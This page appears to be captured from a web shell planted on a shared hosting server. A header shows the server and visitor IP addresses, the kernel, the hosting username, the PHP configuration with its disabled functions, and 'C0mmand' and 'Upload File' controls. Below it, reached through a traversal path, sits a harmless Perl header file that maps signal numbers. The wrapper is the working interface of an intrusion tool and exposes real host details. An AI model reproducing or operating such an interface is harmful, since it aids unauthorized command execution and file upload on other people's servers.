|
Server IP : 82.197.83.136 / Your IP : 216.73.217.148 Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64 User : u163988420 ( 163988420) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/../lib64/xtables/../gawk/../python3.6/../GraphicsMagick-1.3.38/../perl5/bits/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
require '_h2ph_pre.ph';
no warnings qw(redefine misc);
unless(defined(&_BITS_SIGNUM_H)) {
eval 'sub _BITS_SIGNUM_H () {1;}' unless defined(&_BITS_SIGNUM_H);
unless(defined(&_SIGNAL_H)) {
die("Never include <bits/signum.h> directly; use <signal.h> instead.");
}
require 'bits/signum-generic.ph';
eval 'sub SIGSTKFLT () {16;}' unless defined(&SIGSTKFLT);
eval 'sub SIGPWR () {30;}' unless defined(&SIGPWR);
undef(&SIGBUS) if defined(&SIGBUS);
eval 'sub SIGBUS () {7;}' unless defined(&SIGBUS);
undef(&SIGUSR1) if defined(&SIGUSR1);
eval 'sub SIGUSR1 () {10;}' unless defined(&SIGUSR1);
undef(&SIGUSR2) if defined(&SIGUSR2);
eval 'sub SIGUSR2 () {12;}' unless defined(&SIGUSR2);
undef(&SIGCHLD) if defined(&SIGCHLD);
eval 'sub SIGCHLD () {17;}' unless defined(&SIGCHLD);
undef(&SIGCONT) if defined(&SIGCONT);
eval 'sub SIGCONT () {18;}' unless defined(&SIGCONT);
undef(&SIGSTOP) if defined(&SIGSTOP);
eval 'sub SIGSTOP () {19;}' unless defined(&SIGSTOP);
undef(&SIGTSTP) if defined(&SIGTSTP);
eval 'sub SIGTSTP () {20;}' unless defined(&SIGTSTP);
undef(&SIGURG) if defined(&SIGURG);
eval 'sub SIGURG () {23;}' unless defined(&SIGURG);
undef(&SIGPOLL) if defined(&SIGPOLL);
eval 'sub SIGPOLL () {29;}' unless defined(&SIGPOLL);
undef(&SIGSYS) if defined(&SIGSYS);
eval 'sub SIGSYS () {31;}' unless defined(&SIGSYS);
undef(&__SIGRTMAX) if defined(&__SIGRTMAX);
eval 'sub __SIGRTMAX () {64;}' unless defined(&__SIGRTMAX);
}
1;